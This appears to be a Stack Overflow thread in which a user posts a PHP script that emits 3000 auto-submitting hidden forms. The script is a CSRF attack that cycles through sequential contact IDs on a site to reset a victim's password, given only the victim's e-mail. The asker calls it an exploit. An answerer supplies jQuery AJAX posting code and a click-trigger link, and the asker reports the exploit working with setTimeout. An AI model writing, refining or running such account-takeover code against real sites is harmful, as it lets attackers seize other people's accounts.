-1

In order to explain what I am trying to accomplish, here are some facts:

  • www.testsite.com is not CSRF protected and it is possible for an attacker to change the password of a victim if he knows the e-mail of the victim and his unique contactid.
  • Every new users gains a new ID by simply auto incrementing with 1. There are only 3000 contactIDs right now; so that means 1,2,3,4,5,6 --> 3000.
  • If an attackers knows the e-mail of a victim, he can simply keep guessing contactIDs (maximal of 3000) and then he can change it. I want to do this automatically.

- I am trying to create a PHP script to learn more about code and to show how simple this is. I am not a malicious hacker or anything close.

So I figured that I could just use a loop that auto increments contactIDs and then posts the data to the www.testsite.com. The problem is, it does not send all the POST requests (with contactID=1 and another one with contactID=2 etc)... Here is my code:

<?php 

echo "I set the password to 'stackoverflow'. <br/>";

$mailadres = 1; //startvalue to remove that undefined index php error.

if (isset($_GET['mailadres'])){ //i hate undefined errors
    $mailadres = $_GET['mailadres'];
}

if ($mailadres == 1) { //Tell users that you have to submit e-mail via _GET
echo "usage: ./csrf.php?mailadres=victim@gmail.com <br/>";
}


$contactid = 1; //We begin with one....


while ($contactid <= 3000) { //There are not more contactID's than 3000 at this moment.

    echo "<form name='csrf' action='http://www.testsite.com/submit.php' method='POST'>
                 <input type='hidden' name='contactid' value='{$contactid}'>
                 <input type='hidden' name='something' value='something'>
                <input type='hidden' name='mailadres'' value='{$mailadres}'>
                <input type='hidden' name='changepassword' value='stackoverflow'>
            </form>
            <script>document.csrf.submit();</script>";
    $contactid ++;  //increment in order to post every contactID. 

}


?>

My question is: How do I make PHP submit all these forms (contactid=1 & contactid=2)

1 Answers1

0

Firstly you need to get rid of the action, method etc in the form. Let it be simple like below:

<form id="form1">
.....
</form>

Then you need to give if for elements, give same name given as in 'name'. For example see like

<input type='hidden' name='contactid' id='contactid' value='{$contactid}'>

Then have a button with onClick() and trigger a function, like

<button id="button1" onclick="postData()">PostData</button>

then have a function like this

function postData(d1, d2, d3, d4) {
$.ajax({
    url: 'http://www.testsite.com/submit.php',
    data: {
        data1: d1,
        data2: d2,
        data3: d3,
        data4: d4
    },
    type: 'POST',
    success: function(result) {
       //code for success
    },
    error: function(jqXHR, textStatus, errorThrown) {
         //code in case of error
    }
});
}

Whenever the button click occurs, you the data will be automatically posted to the given url.

Hope this helps.

kdmurray
  • 2,988
  • 3
  • 32
  • 47
praveenkrishp
  • 96
  • 1
  • 8
  • See @SergeVanHaag, in reality what happens is you write something like this. The end user fills the form and click the button(PostData here). Every time a user clicks the button the data is posted. There is actually no need to worry about the count.. – praveenkrishp Sep 16 '16 at 06:40
  • yes, but I'm writing an exploit. It is necessary that onclick, automatically 3000 post requests happen instead of doing everything manually (that takes days). –  Sep 16 '16 at 06:42
  • Hi, I guess this could solve your query, [link](http://stackoverflow.com/questions/2381572/how-can-i-trigger-a-javascript-event-click/2381612#2381612). Though this is not advisable. – praveenkrishp Sep 16 '16 at 06:50
  • Hi Praveenkrishp. The method that you sent me was not efficient. It would open like 3000 tabs. I can do that same thing by just changing
    to
    ... It's not more efficient. Still thanks tho, my exploit works just fine with the setTimeout.
     –  Sep 17 '16 at 10:45